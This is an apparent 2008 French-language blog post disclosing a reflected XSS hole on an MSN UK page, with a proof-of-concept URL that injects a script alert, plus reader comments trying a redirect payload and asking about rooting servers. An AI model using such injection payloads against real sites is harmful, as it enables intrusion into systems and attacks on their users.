XSS sur le site de msn UK

19 octobre 200819 octobre 2008 admin

La gravité des failles XSS n’est plus a démontrées , Voici la faille XSS que j ‘ai trouver sur le site de MSN grand bretagne :

http://energy.money.uk.msn.com/msn/Utilities/?cmd=%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83,32,66,89,32,72,65,77,90,65,46,77,65))%3C/SCRIPT%3E

msn-xss

2 thoughts on “XSS sur le site de msn UK”

DiAbLuS dit :

4 janvier 2009 à 16:07

Salam
Nice Post 😉
walakin si on inject un script de redirection sa marche pas … alors cette faille né po a 100% exploitable regard 😉

h**p://energy.money.uk.msn.com/msn/Utilities/?cmd= »>document.location.href= »http://www.google.com »

Bonne continuation fréro
brahim dit :

20 septembre 2009 à 13:46

salut wllahila bessah mazal vulenrable :d
walakin pour les code utilsé fdak script mafhamthomch rooter serveur a si hicham 🙂